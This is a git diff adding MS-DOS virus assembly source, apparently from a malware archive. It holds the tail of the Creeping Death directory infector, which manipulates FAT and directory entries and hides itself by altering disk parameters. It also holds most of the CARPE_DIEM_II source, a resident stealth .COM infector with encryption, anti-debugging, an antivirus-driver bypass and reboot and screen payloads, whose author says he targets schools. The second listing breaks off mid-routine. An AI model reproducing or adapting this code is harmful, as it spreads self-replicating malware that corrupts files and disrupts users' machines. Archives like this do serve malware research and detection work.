+ mov ds:[bx+12],cs
+ pop ds
+ push cs
+ pop es
+
+ mov di,offset f_name ; copy name of this file
+ push di
+ mov cx,40
+ rep movsw
+ push cs
+ pop ds
+
+ mov ah,3dh ; open file, this file will
+ mov dx,offset File ; not be found but the entire
+ int 21h ; directory is searched and
+ pop dx ; infected
+
+ mov ax,4b00h ; execute file
+ int 21h
+Exit: mov ah,4dh ; get exit-code
+ int 21h
+ mov ah,4ch ; terminate (al = exit code)
+ int 21h
+
+;*****************************************************************************;
+; ;
+; Installation complete ;
+; ;
+;*****************************************************************************;
+; ;
+; The next part contains the device driver used by creeping death to infect ;
+; directory's ;
+; ;
+; The device driver uses only the strategy routine to handle the requests. ;
+; I don't know if this is because the virus will work better or the writer ;
+; of this virus didn't know how to do it right. ;
+; ;
+;*****************************************************************************;
+
+
+Strategy: mov cs:RequestOffset,bx
+ mov cs:RequestSegment,es
+ retf
+
+Interrupt: push ax ; driver strategy block
+ push bx
+ push cx ; save registers
+ push dx
+ push si
+ push di
+ push ds
+ push es
+
+ les bx,cs:Request
+ push es
+ pop ds
+ mov al,ds:[bx+2] ; Command Code
+
+ cmp al,4 ; Input
+ je Input
+ cmp al,8 ; Output
+ je Output
+ cmp al,9
+ je Output
+
+ call DoRequest
+
+ cmp al,2 ; Build BPB
+ jne Return
+ lds si,ds:[bx+12h] ; copy the BPB and change it
+ mov di,offset bpb_buf ; into one that hides the virus
+ mov es:[bx+12h],di
+ mov es:[bx+14h],cs
+ push es ; copy
+ push cs
+ pop es
+ mov cx,16
+ rep movsw
+ pop es
+ push cs
+ pop ds
+ mov al,ds:[di+2-32] ; change
+ cmp al,2
+ adc al,0
+ cbw
+ cmp word ptr ds:[di+8-32],0 ; >32mb partition ?
+ je m32 ; yes, jump to m32
+ sub ds:[di+8-32],ax ; <32mb partition
+ jmp short Return
+m32: sub ds:[di+15h-32],ax ; >32mb partition
+ sbb word ptr ds:[di+17h-32],0
+Return: pop es ; return to caller
+ pop ds
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ retf
+
+Output: mov cx,0ff09h ; check if disk changed
+ call check
+ jz InfectSector ; no, just infect sector
+ call DoRequest ; yes, write virus to disk
+ jmp short inf_dsk
+
+InfectSector: jmp _InfectSector ; infect sector
+Read: jmp _Read ; read sector
+ReadError: add sp,16 ; error during request
+ jmp short Return
+
+Input: call check ; check if disk changed
+ jz Read ; no, read sector
+inf_dsk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk
+ cld ; save last part of request
+ lea si,ds:[bx+0eh]
+ mov cx,8
+save: lodsw
+ push ax
+ loop save
+ mov word ptr ds:[bx+14h],1 ; read 1st sector on disk
+ call ReadSector
+ jnz ReadError
+ mov byte ptr ds:[bx+2],2 ; build BPB
+ call DoRequest
+ lds si,ds:[bx+12h] ; ds:si = BPB
+ mov di,ds:[si+6] ; size of root directory
+ add di,15 ; in sectors
+ mov cl,4
+ shr di,cl
+ mov al,ds:[si+5]
+ cbw
+ mov dx,ds:[si+0bh]
+ mul dx ; ax=fat sectors, dx=0
+ add ax,ds:[si+3]
+ add di,ax
+ push di ; save it on stack
+ mov ax,ds:[si+8] ; total number of sectors
+ cmp ax,dx ; >32mb
+ jnz more ; no, skip next 2 instructions
+ mov ax,ds:[si+15h] ; get number of sectors
+ mov dx,ds:[si+17h]
+more: xor cx,cx ; cx=0
+ sub ax,di ; dx:ax=number is data sectors
+ sbb dx,cx
+ mov cl,ds:[si+2] ; cx=sectors / cluster
+ div cx ; number of clusters on disk
+ cmp cl,2 ; 1 sector/cluster ?
+ sbb ax,-1 ; number of clusters (+1 or +2)
+ push ax ; save it on stack
+ call Convert ; get fat sector and offset in
+ mov byte ptr es:[bx+2],4 ; sector
+ mov es:[bx+14h],ax
+ call ReadSector ; read fat sector
+again: lds si,es:[bx+0eh]
+ add si,dx
+ sub dh,cl ; has something to do with the
+ adc dx,ax ; encryption of the pointers
+ mov word ptr cs:[gad+1],dx
+ cmp cl,1 ; 1 sector / cluster
+ jne Ok
+SmallModel: not di ; this is used when the
+ and ds:[si],di ; clusters are 1 sector long
+ pop ax
+ push ax
+ inc ax
+ push ax
+ mov dx,0fh
+ test di,dx
+ jz here
+ inc dx
+ mul dx
+here: or ds:[si],ax
+ pop ax
+ call Convert
+ mov si,es:[bx+0eh]
+ add si,dx
+Ok: mov ax,ds:[si]
+ and ax,di
+ mov dx,di ; allocate cluster
+ dec dx
+ and dx,di
+ not di
+ and ds:[si],di
+ or ds:[si],dx
+ cmp ax,dx ; cluster already allocated by
+ pop ax ; the virus ?
+ pop di
+ mov word ptr cs:[pointer+1],ax
+ je _Read_ ; yes, don't write it and go on
+ mov dx,ds:[si]
+ push ds
+ push si
+ mov byte ptr es:[bx+2],8 ; write
+ call DoRequest ; write the adjusted sector to
+ pop si ; disk
+ pop ds
+ jnz _Read_
+ call ReadSector ; read it again
+ cmp ds:[si],dx ; is it written correctly ?
+ jne _Read_ ; no, can't infect disk
+ dec ax
+ dec ax ; calculate the sector number
+ mul cx ; to write the virus to
+ add ax,di
+ adc dx,0
+ push es
+ pop ds
+ mov word ptr ds:[bx+12h],2
+ mov ds:[bx+14h],ax ; store it in the request hdr
+ test dx,dx
+ jz less
+ mov word ptr ds:[bx+14h],-1
+ mov ds:[bx+1ah],ax
+ mov ds:[bx+1ch],dx
+less: mov ds:[bx+10h],cs
+ mov ds:[bx+0eh],100h
+ mov byte ptr es:[bx+2],8 ; write it
+ call EncryptWrite1
+
+_Read_: mov byte ptr ds:[bx+2],4 ; restore this byte
+ std ; restore other part of the
+ lea di,ds:[bx+1ch] ; request
+ mov cx,8
+load: pop ax
+ stosw
+ loop load
+_Read: call DoRequest ; do request
+
+ mov cx,9
+_InfectSector: mov di,es:[bx+12h] ; get number of sectors read
+ lds si,es:[bx+0eh] ; get address of data
+ sal di,cl ; calculate end of buffer
+ xor cl,cl
+ add di,si
+ xor dl,dl
+ push ds ; infect the sector
+ push si
+ call find
+ jcxz no_inf ; write sector ?
+ mov al,8
+ xchg al,es:[bx+2] ; save command byte
+ call DoRequest ; write sector
+ mov es:[bx+2],al ; restore command byte
+ and byte ptr es:[bx+4],07fh
+no_inf: pop si
+ pop ds
+ inc dx ; disinfect sector in memory
+ call find
+ jmp Return ; return to caller
+
+;*****************************************************************************;
+; ;
+; Subroutines ;
+; ;
+;*****************************************************************************;
+
+find: mov ax,ds:[si+8] ; (dis)infect sector in memory
+ cmp ax,"XE" ; check for .exe
+ jne com
+ cmp ds:[si+10],al
+ je found
+com: cmp ax,"OC" ; check for .com
+ jne go_on
+ cmp byte ptr ds:[si+10],"M"
+ jne go_on
+found: test word ptr ds:[si+1eh],0ffc0h ; file to big
+ jnz go_on ; more than 4mb
+ test word ptr ds:[si+1dh],03ff8h ; file to small
+ jz go_on ; less than 2048 bytes
+ test byte ptr ds:[si+0bh],1ch ; directory, system or
+ jnz go_on ; volume label
+ test dl,dl ; infect or disinfect ?
+ jnz rest
+pointer: mov ax,1234h ; ax = viral cluster
+ cmp ax,ds:[si+1ah] ; file already infected ?
+ je go_on ; yes, go on
+ xchg ax,ds:[si+1ah] ; exchange pointers
+gad: xor ax,1234h ; encryption
+ mov ds:[si+14h],ax ; store it on another place
+ loop go_on ; change cx and go on
+rest: xor ax,ax ; ax = 0
+ xchg ax,ds:[si+14h] ; get pointer
+ xor ax,word ptr cs:[gad+1] ; Encrypt
+ mov ds:[si+1ah],ax ; store it on the right place
+go_on: rol word ptr cs:[gad+1],1 ; change encryption
+ add si,32 ; next directory entry
+ cmp di,si ; end of buffer ?
+ jne find ; no, do it again
+ ret ; return
+
+check: mov ah,ds:[bx+1] ; get number of unit
+drive: cmp ah,-1 ; same as last call ?
+ mov byte ptr cs:[drive+2],ah ; set 2nd parameter
+ jne changed
+ push ds:[bx+0eh] ; save word
+ mov byte ptr ds:[bx+2],1 ; disk changed ?
+ call DoRequest
+ cmp byte ptr ds:[bx+0eh],1 ; 1=Yes
+ pop ds:[bx+0eh] ; restore word
+ mov ds:[bx+2],al ; restore command
+changed: ret ; return
+
+ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk
+
+DoRequest: db 09ah ; call 70:?, orginal strategy
+StrBlock dw ?,70h
+ db 09ah ; call 70:?, orginal interrupt
+IntBlock dw ?,70h
+ test byte ptr es:[bx+4],80h ; error ? yes, zf = 0
+ ret ; return
+
+Convert: cmp ax,0ff0h ; convert cluster number into
+ jae fat_16 ; an sector number and offset
+ mov si,3 ; into this sector containing
+ xor word ptr cs:[si+gad-1],si ; the fat-item of this
+ mul si ; cluster
+ shr ax,1
+ mov di,0fffh
+ jnc cont
+ mov di,0fff0h
+ jmp short cont
+fat_16: mov si,2
+ mul si
+ mov di,0ffffh
+cont: mov si,512
+ div si
+ inc ax
+ ret
+
+EncryptWrite1: push ds
+ push cs
+ pop ds
+ push es
+ push cs
+ pop es
+ cld
+ mov cx,12
+ mov si,offset Encrypt
+ mov di,offset EncryptWrite2
+ inc byte ptr ds:[si+8]
+ rep movsb
+ mov cl,10
+ mov si,offset DoRequest
+ rep movsb
+ mov cl,12
+ mov si,offset Encrypt
+ rep movsb
+ mov ax,0c31fh
+ stosw
+ pop es
+ jmp EncryptWrite2
+
+;*****************************************************************************;
+; ;
+; Data ;
+; ;
+;*****************************************************************************;
+
+File: db "C:",255,0 ; the virus tries to open this
+ ; file
+
+Counter dw 0 ; this will count the number of
+ ; systems that are infected by
+ ; this virus
+
+Param: dw 0,80h,?,5ch,?,6ch,? ; parameters for the
+ ; exec-function
+
+Signature db 'CREEPING DEATH 3' ; Signature
+
+Header db 7 dup(?) ; this is the header for the
+ ; device driver
+
+f_name: db ? ; Buffer for the filename used
+ ; by the exec-function
+
+;*****************************************************************************;
+; ;
+; The End ;
+; ;
+;*****************************************************************************;
+
+code ends
+
+end Encrypt
diff --git a/MSDOS/Virus.MSDOS.Unknown.cdiem2.asm b/MSDOS/Virus.MSDOS.Unknown.cdiem2.asm
new file mode 100644
index 00000000..ec847831
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cdiem2.asm
@@ -0,0 +1,847 @@
+; This is some version of CARPE_DIEM_II.
+
+; First of all - I would like to thank the following people for
+; helping me out:
+
+; Blonde - Without your assistence, this virus would be no
+; full stealth virus, hurray for you.
+; Conzouler - For general assistence concerning bug-eliminating.
+; Stormbringer - For writing code which make sense.
+; Priest - For the code-fragments included, hints, ideas,
+; and happy comments!
+
+; Anyhow, you've seen nearly seen this before. But it has (again)
+; taken a new shape.
+
+; I would like to point out that this version is under no circumstances
+; destructive. It might bug sometime while spreading in weird invoroments,
+; but since I run pure DOS myself - I havn't done a depth in study
+; conserning how and when. Deal with it.
+
+; The name is a bit confusing I think. I.e. I find the quation from
+; Horatius (partly) wrong.
+
+; The greek - swedish - english translation could read something like:
+
+; "Seize the day and trust as less as possible on the future. . . "
+
+; ... but since the future isn't tommorow, but now, I find it a
+; bit irritating. Ah well.
+
+; Anyhow - it's an old simply com-infector, and since it infects
+; com-files only - it won't spread very far. But since my favorite
+; targets are schools and since my mission is to annoy them as
+; much as possible (with payloads), I reckon it does its work good
+; enough. (Ask Billy The Kid's sysadm! :)).
+
+; It isn't too visible since it will stealth file-size increases,
+; and disinfect files opened. It has though some pretty visible
+; payloads (black-to white color-fade all the time the 17.ten and
+; it might print and reboot sometimes. . ).
+
+; It includes encryption, soft-anti-debugging, anti-tb*, otherwise,
+; it's pretty much your average virus.
+
+; Further greetings goes out to all of VLAD and all of #virus :).
+
+; Sincerly - The Unforgiven, Immortal Riot - National Malware Developemt, 1995.
+
+.model tiny
+.code
+org 100h
+
+vir_size equ end_of_virus-start_of_virus
+
+start_of_virus:
+vstart:
+
+ jmp entry_point
+
+install:
+
+ mov ah,2ah ;get date
+ int 21h
+ cmp dl,17d ;day = 17?
+ jne get ;naw!
+ mov cs:[activate_flag],1 ;yeh!
+
+get:
+ mov ah,4ah ;Installation check for the runtime
+ mov bx,0FFFFH ;part. (This is overkill)
+ mov cx,0bebeh
+ int 21h
+ cmp ax,cx ;ax=cx=0bebe?
+ jne not_res ;no!
+ jmp already_resident
+
+not_res:
+ mov ah,4ah ;Use normal DOS-functions to
+ sub bx,(vir_size+15)/16+1 ;fix the TSR part.
+ int 21h ;(c) DA/PS ??
+
+ mov ah,48h ;allocate enough room for our code
+ mov bx,(vir_size+15)/16
+ int 21h
+
+ dec ax ;ax-1 = MCB for allocated memory
+ mov es,ax ;es=segment
+ mov word ptr es:[1],8 ;Mark DOS as owner
+
+ push cs ;cs=ds
+ pop ds
+
+ cld ;clear direction for string operations
+ sub ax,0fh ;100h bytes from allocstart
+ mov es,ax ;es:[100h] = start of allocated memory
+ mov di,100h
+ lea si,[bp+offset start_of_virus]
+ mov cx,(vir_size+1)/2 ;copy entire virus to memory
+ rep movsw
+
+ push es ;es=ds
+ pop ds
+
+ mov ax,3521h ;get interrupt vector from es:bx for
+ int 21h ;int21h
+
+tb_lup:
+ cmp word ptr es:[bx],05ebh ;check for short jump
+ jne no_tbdriver
+ cmp byte ptr es:[bx+2],0eah ;and for far jump to next int handler
+ jne no_tbdriver
+ les bx,es:[bx+3] ;if found TBdriver, get next int
+ jmp tb_lup ;handler and use that as int 21 adr
+
+no_tbdriver:
+
+ mov word ptr ds:[Org21ofs],bx ;save segment:offset for int21h
+ mov word ptr ds:[Org21seg],es ;in a word each
+
+ cmp byte ptr cs:[activate_flag],1
+ jne skip_08_get ;not the 17:ten!
+
+ mov al,08h
+ int 21h
+ mov word ptr ds:[org08ofs],bx
+ mov word ptr ds:[org08seg],es
+
+skip_08_get:
+
+ mov al,09h ;get interrupt vector for int09h
+ int 21h ;as well as
+ mov word ptr ds:[org09ofs],bx
+ mov word ptr ds:[org09seg],es
+
+ mov dx, offset new_int21h ;set new int.vector for 21h to ds:dx
+ mov ax,2521h
+ int 21h
+
+ cmp byte ptr cs:[activate_flag],1 ;day = 17?
+ jne skip_08_set ;no!
+
+ mov dx, offset new_08h
+ mov al,08h
+ int 21h
+
+skip_08_set:
+ mov dx,offset new_09h ;09
+ mov al,09h
+ int 21h
+
+already_resident:
+tbdriver:
+ mov di,100h ;transer back control to the infected
+ push di ;host program.
+ push cs ;make cs=ds=es
+ push cs
+ pop es
+ pop ds
+ lea si,[bp+orgjmp] ;move orgjmp of 4 bytes to the
+ movsw ;correct (100h) memory adress.
+ movsw
+exit:
+ ret ;and exit!
+
+
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+; This is the new int21h Handler
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+new_int21h:
+ cmp ah,4ah ;ah=4ah?
+ jne chk_exec ;no!
+ cmp bx,0ffffh ;bx = -1?
+ jne no_match ;no!
+ cmp cx,0bebeh ;cx = 0bebeh?
+ jne no_match ;no!
+ mov ax,cx ;=> Installation check, move bebe into ax
+ iret ;and return (ax=cx=0bebeh)
+
+chk_exec:
+ cmp ax,4b00h ;infect on execute
+ je go_infect
+
+chk_close:
+ cmp ah,3eh ;infect on file-closes
+ je go_close
+
+ cmp ah,3dh ;normal file-open? - Disinfect
+ je go_disinfect
+
+chk_dir:
+ cmp ah,11h ;stealth file size increase on
+ je go_fcb_stealth ;directory listenings using
+ cmp ah,12h ;functions 11/12/4e/4fh
+ je go_fcb_stealth
+
+ cmp ah,4eh
+ je go_handle_stealth
+
+ cmp ah,4fh
+ je go_handle_stealth
+
+no_match:
+ jmp do_oldint21h ;jmp org vector
+
+go_infect:
+ jmp infect
+
+go_close:
+ call setcritical
+ jmp infect_close
+
+go_disinfect:
+ call setcritical
+ jmp open_disinfect
+
+go_fcb_stealth:
+ jmp hide_dir
+
+go_handle_stealth:
+ jmp hide_dir2
+
+dps db "CARPE_DIEM_II - FLOATING THROUGH THE VOID!",7,0 ;CC
+
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+; This is the new int08h Handler
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+new_08h:
+ push ax ;Toy with the black-ground color!!
+ push dx
+ mov dx,03c8h
+ xor al,al
+ out dx,al
+ inc dx
+ mov al,[cs:bgcol]
+ out dx,al
+ out dx,al
+ out dx,al
+ inc [cs:bgcol]
+ pop dx
+ pop ax
+
+do_old08h:
+ db 0eah ;and jump to saved vector for int08h
+ org08ofs dw ?
+ org08seg dw ?
+
+
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+; This is the new int09h Handler
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+new_09h:
+ push ax ;preserve register in use
+ push ds
+
+ xor ax,ax
+ mov ds,ax ;ds=0
+
+ in al,60h ;read key
+ cmp al,53h ;delete?
+ jnz no_ctrl_alt_del ;no!
+
+ test byte ptr ds:[0417h],0ch ;test for alt-ctrl
+ je no_ctrl_alt_del ;no. .
+
+ in al,41h ;get random value
+ test al,11111b ;2^5 = 32
+ jne no_ctrl_alt_del ;value doesnt match!
+
+ push cs ;cs=ds
+ pop ds
+
+ mov ax,3 ;set grafic mode (text)
+ int 10h
+
+ mov ah,2 ;set cursor pos
+ xor bh,bh
+ mov dx,0A14h ;10,20d (middle)
+ int 10h
+
+ mov ah,1 ;set cursor
+ mov cx,2020h ;>nul
+ int 10h
+
+ mov si,offset dps ;point to v_name
+
+all_chars:
+ loop all_chars
+ lodsb ;load string by byte from dps
+ or al,al ;end of string? (al=0)
+ je cold_boot ;yes, make a cold boot
+
+ mov ah,0Eh ;display character from string
+ int 10h
+
+ jmp short all_chars ;put next char to string
+
+cold_boot:
+ db 0eah ;jmp far ptr
+ db 00h, 00h, 0ffh, 0ffh ;coldboot vector
+
+no_ctrl_alt_del:
+ pop ds ;restore registers
+ pop ax
+
+do_oldint09h:
+ db 0eah ;and jump to saved vector for int09h
+ org09ofs dw ?
+ org09seg dw ?
+
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+; This will fool directory listenings using FCBs
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+hide_dir: ;FCB stealth routine
+ pushf ;simulate a int call with pushf
+ push cs ;and cs, ip on the stack
+ call do_oldint21h
+ or al,al ;was the dir call successfull??
+ jnz skip_dir ;naw!
+
+ push ax
+ push bx
+ push es
+
+ mov ah,62h ;get active PSP to es:bx (51h as well)
+ int 21h
+ mov es,bx
+ cmp bx,es:[16h] ;PSP belongs to dos?
+ jnz bad_psp ;no, we don't want chkdsk fuck-up's!
+
+ mov bx,dx
+ mov al,[bx] ;al holds current drive - FFh means
+ push ax ;extended FCB
+ mov ah,2fh ;get DTA-area
+ int 21h
+ pop ax
+ inc al ;is it an extended FCB
+ jnz no_ext
+ add bx,7 ;if so add 7 to skip garbage
+no_ext:
+ mov al,byte ptr es:[bx+17h] ;get seconds field
+ and al,1fh
+ xor al,1dh ;is the file infected??
+ jnz no_stealth ;if not - don't hide size
+
+ cmp word ptr es:[bx+1dh],vir_size-3 ;if a file with same seconds
+ jbe no_stealth ;as an infected is smaller -
+ sub word ptr es:[bx+1dh],vir_size-3 ;don't hide size
+no_stealth:
+bad_psp:
+ pop es
+ pop bx
+ pop ax
+skip_dir:
+ iret
+
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+; This will fool directory listenings using File Handles
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+hide_dir2:
+
+ pushf
+ push cs
+ call do_oldint21h
+
+ jc no_files
+
+ pushf
+ push ax
+ push di
+ push es
+ push bx
+
+ mov ah,2fh ;Get DTA-area
+ int 21h
+
+ mov di,bx
+ add di,1eh
+ cld
+ mov cx,9 ;scan for the dot which
+ mov al,'.' ;extension
+ repne scasb ;
+ jne not_inf
+
+ cmp word ptr es:[di],'OC' ;CO?
+ jne not_inf ;yeh!
+
+ cmp byte ptr es:[di+2],'M' ;COM?
+ jne not_inf ;yeh!
+
+ mov ax,es:[bx+16h] ;ask file time
+ and al,1fh
+ xor al,1dh ;is the file infected??
+ jnz not_inf
+
+ cmp word ptr es:[bx+1ah],vir_size ;dont stealth too small
+ ja hide ;files
+
+ cmp word ptr es:[bx+1ch],0 ;or too damn big files
+ je not_inf
+
+hide:
+ sub es:[bx+1ah],vir_size-3 ;<- no, its not a SUB-routine!
:)
+
+not_inf:
+ pop bx
+ pop es
+ pop di
+ pop ax
+ popf
+
+no_files:
+ retf 2 ;return and pop 2 of stack
+
+infect_close:
+ push es
+ push bp
+ push ax
+ push bx
+ push cx
+ push si
+ push di
+ push ds
+ push dx
+ cmp bx,4 ;don't close null, aux and so
+ jbe no_close
+
+ call check_name ;es:di points to file name
+ add di,8 ;es:di points to extension
+ cmp word ptr es:[di],'OC'
+ jne no_close
+ cmp byte ptr es:[di+2],'M' ;if COM infect it!
+ je close_infection
+
+no_close:
+ pop dx ;No comfile!
+ pop ds
+ pop di
+ pop si
+ pop cx
+ pop bx
+ pop ax
+ pop bp
+ pop es
+
+ jmp do_oldint21h
+
+close_infection:
+ mov byte ptr es:[di-26h],2 ;mark read & write access
+ mov cs:Closeflag,1 ;raise closeflag for exit procedure
+
+ mov ax,4200h ;rewind file
+ xor cx,cx
+ cwd
+ int 21h
+
+ jmp short infect_on_close ;infect it
+check_name:
+ push bx
+ mov ax,1220h ;get job file table for handle at es:di
+ int 2fh
+
+ mov ax,1216h ;get system file table
+ mov bl,byte ptr es:[di] ;for handle index in bx
+ int 2fh
+ pop bx
+ add di,20h ;es:di+20h points to file name
+ ret ;return
+
+infect:
+ push es
+ push bp
+ push ax
+ push bx
+ push cx
+ push si
+ push di
+ push ds
+ push dx
+
+ call setcritical
+
+ mov cs:Closeflag,0 ;make sure closeflag is off
+ mov ax,4300h ;get attrib
+ int 21h
+ push cx ;save attrib onto the stack
+ mov ax,4301h ;clear attrib
+ xor cx,cx
+ int 21h
+
+ mov ax,3d02h ;open file
+ pushf
+ push cs
+ call do_oldint21h
+
+ xchg ax,bx ;bx = file handle
+
+infect_on_close: ;entry for infection on 3eh
+
+ push cs ;cs=ds
+ pop ds
+
+ mov ax,5700h ;get time/date
+ int 21h
+ push cx ;save time/date onto the stack
+ push dx
+
+ mov ah,3fh ;read three bytes to orgjmp
+ mov cx,4
+ mov dx,offset ds:orgjmp
+ int 21h
+
+ cmp word ptr ds:orgjmp,'ZM' ;check if .EXE file
+ je exe_file
+ cmp word ptr ds:orgjmp,'MZ'
+ je exe_file ;if so - don't infect
+
+; cmp byte ptr ds:orgjmp+1,'m' ;dont infect command.com
+; je skip_infect ;beta versions ONLY!
+
+ cmp byte ptr ds:orgjmp+3,'' ;dont reinfect files!
+ jne lseek_eof
+ jmp short skip_infect
+
+exe_file:
+ mov cs:exeflag,1 ;mark file as EXE-file, and
+ jmp short skip_infect ;don't set second value for it!
+
+lseek_eof:
+ mov ax,4202h ;go end of file, offset in dx:cx
+ xor cx,cx ;and return file size in dx:ax.
+ xor dx,dx
+ int 21h
+
+ cmp ax,(0FFFFH-Vir_size) ;file is too big?
+ jae skip_infect ;yeh
+ cmp ax,(vir_size-100h) ;file is too small?
+ jb skip_infect ;yeh
+
+ add ax,offset entry_point-106h ;calculate entry offset to jmp
+ mov word ptr ds:newjmp[1],ax ;move it to newjmp
+
+get_rnd:
+ mov ah,2ch ;get random number and put enc_val
+ int 21h
+ or dl,dl ;dl=0 - get another value!
+ je get_rnd
+ mov word ptr ds:enc_val,dx
+ mov ax,08d00h ;copy entire virus to 8d00h:100h
+ mov es,ax
+ mov di,100h
+ mov si,di
+ mov cx,(vir_size+1)/2
+ rep movsw
+ push es
+ pop ds
+ xor bp,bp ;and encrypt it there
+ call encrypt
+
+ mov ah,40h ;write virus to file from position
+ mov cx,end_of_virus-install ;08d00h:100h
+ mov dx,offset install
+ int 21h
+
+ push cs ;cs=ds
+ pop ds
+
+ mov ax,4200h ;go to beginning of file
+ xor cx,cx
+ cwd
+ int 21h
+
+ mov ah,40h ;and write a new-jmp-construct
+ mov cx,4 ;of 4 bytes (4byte=infection marker)
+ mov dx,offset newjmp
+ int 21h
+
+skip_infect:
+ mov ax,5701h ;restore
+ pop dx ;date
+ pop cx ;time
+ cmp byte ptr cs:[exeflag],1 ;exe file?
+ je skip_sec ;if so - keep the sec_value intact
+ or cl,00011101b ;and give com-files second value
+ and cl,11111101b ;29
+skip_sec:
+ int 21h
+ cmp byte ptr cs:[Closeflag],1 ;check if execute or close infeection,
+ je dont_close ;if infect on close, dont close file
+
+close_file:
+ mov ah,3eh ;close the file which were executed
+ int 21h
+ pop cx ;get original file-attribs
+dont_close:
+ pop dx ;ds:dx = filename
+ pop ds
+ cmp byte ptr cs:[Closeflag],1
+ je exit_close
+ mov ax,4301h ;set back saved attribute
+ int 21h
+
+exit_close:
+ mov byte ptr cs:closeflag,0
+ call resetcritical
+ pop di
+ pop si
+ pop cx
+ pop bx
+ pop ax
+ pop bp
+ pop es
+
+do_oldint21h:
+O21h:
+ db 0eah ;jmp far ptr
+ org21ofs dw ? ;s:o to
+ org21seg dw ? ;int21h
+
+ ret ;call to DOS. . . return!
+
+vir db "SVW: The Unforgiven/Immortal Riot",0
+fcl db "Fuck Corporate Life!",0 ;I agree you SB!
+
+closeflag db 0 ;0 if exec 1 if close
+exeflag db 0
+activate_flag db 0
+bgcol db 0
+newjmp db 0e9h,00h,00h,'' ;buffer to calculate a new entry
+
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+; Cheesy primitive disinfecting-on-the-fly routine
+;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+open_disinfect: ;ds:dx=filename...
+ push ax
+ push bx
+ push cx
+ push dx
+ push di
+ push si
+ push ds
+ push es ;save all regs/segs...
+
+ push ds
+ pop es ;ds=es
+
+ mov cx,64 ;scan for the dot which
+ mov di,dx ;seperates filename from
+ mov al,'.' ;extension
+ cld ;clear direction
+ repne scasb ;
+
+ cmp word ptr ds:[di],'OC' ;CO?
+ je smallc ;yeh!
+ cmp word ptr ds:[di],'oc' ;co?
+ jne nocom ;naw!
+
+smallc:
+ cmp byte ptr ds:[di+2],'M' ;COM?
+ je open_com ;yeh!
+ cmp byte ptr ds:[di+2],'m' ;com?
+ je open_com ;yeh!
+
+nocom:
+ jmp no_opendis ;no com-file being opened!
+
+open_com:
+ mov ax,3d02h ;open file with r/w access
+ pushf
+ push cs
+ call o21h
+
+ xchg bx,ax ;put filehandle in BX
+
+ push cs ;cs=ds=es
+ pop ds
+ push ds
+ pop es
+
+ mov ax,5700h ;get file info
+ int 21h
+ push cx ;save time
+ push dx ;and date
+
+ and cl,1fh ;see if seconds = 29
+ xor cl,1dh
+ jne close_dis ;is not!
+
+ mov ah,3fh ;read first four bytes
+ mov cx,4 ;to orgjmp
+ mov dx,offset ds:orgjmp
+ int 21h
+
+ cmp byte ptr ds:orgjmp,0e9h ;first byte = jmp?
+ jne close_dis ;no!
+
+ cmp byte ptr ds:orgjmp+3,'' ;infected?
+ jne close_dis ;naw!
+
+ mov ax,4202h ;seek end of file
+ cwd
+ xor cx,cx
+ int 21h
+
+ mov dx,ax ;dx=ax=file size
+ sub ax,(vend-install+3) ;substract orgjmp
+
+ push dx ;save file size on stack
+ xor ax,ax ;zero AX
+
+ sub dx,(vend-orgjmp) ;seek orgjmp location
+ xor cx,cx ;in the infected file
+ mov ah,42h
+ int 21h
+
+ mov ah,3fh ;read the original jump
+ mov cx,4 ;to orgjmp in memory
+ mov dx,offset ds:orgjmp
+ int 21h
+
+ xor ax,ax ;zero AX
+
+ cwd ;seek beginning of file
+ xor cx,cx
+ mov ah,42h
+ int 21h
+
+ mov ah,40h ;write the original saved jmp
+ mov dx,offset orgjmp ;to top of file
+ mov cx,4
+ int 21h
+
+ pop dx ;restore infected file size
+
+ sub dx,(vend-install) ;seek file-size - vir_size
+ xor ax,ax
+ xor cx,cx
+ mov ah,42h
+ int 21h
+
+ mov ah,40h
+ xor cx,cx ;write clean file
+ int 21h
+
+close_dis:
+ mov ax,5701h ;restore saved
+ pop dx ;date
+ pop cx ;and time
+ int 21h
+
+ mov ah,3eh ;close the file
+ pushf
+ push cs
+ call o21h
+
+no_opendis:
+ pop es
+ pop ds
+ pop si
+ pop di
+ pop dx
+ pop cx
+ pop bx
+ pop ax ;restore all segments/registers
+
+bail_out:
+ jmp o21h ;and bail out!
+
+
+; The Set/Restore critical error handler is written by Stormbringer
+; of Phalcon/Skism. I borrowed it because I find it excellent
+; coded. I call the routines a lot of times, so. . . credits to him.
+
+SetCritical:
+ push ax ds
+ mov ax,9
+ mov ds,ax
+ push word ptr ds:[0]
+ push word ptr ds:[2]
+ pop word ptr cs:[OldCritical+2]
+ pop word ptr cs:[OldCritical]
+ mov word ptr ds:[0],offset CriticalError
+ push cs
+ pop word ptr ds:[02]
+ pop ds ax
+ ret
+
+ResetCritical:
+ push ax ds
+ push word ptr cs:[OldCritical]
+ mov ax,9
+ push word ptr cs:[OldCritical+2]
+ mov ds,ax
+ pop word ptr ds:[2]
+ pop word ptr ds:[0]
+ pop ds ax
+ ret
+
+CriticalError:
+ mov al,0
+ iret
+
+OldCritical dd 0
+
+; ---------------------------------------------------------
+; All code below this point is unencrypted - only adresses
+; caluculated from the base pointer will vary. Instructions
+; are the same.
+; ---------------------------------------------------------
+decrypt:
+encrypt:
+ mov ax,word ptr ds:[bp+enc_val] ;enc value in ax
+ lea di,[bp+install] ;pointer to encryption start
+ mov cx,(encrypt-install)/2 ;number of words to be encrypted
+xor_loopy:
+ xor word ptr ds:[di],ax
+ inc di
+ inc di
+ loop xor_loopy
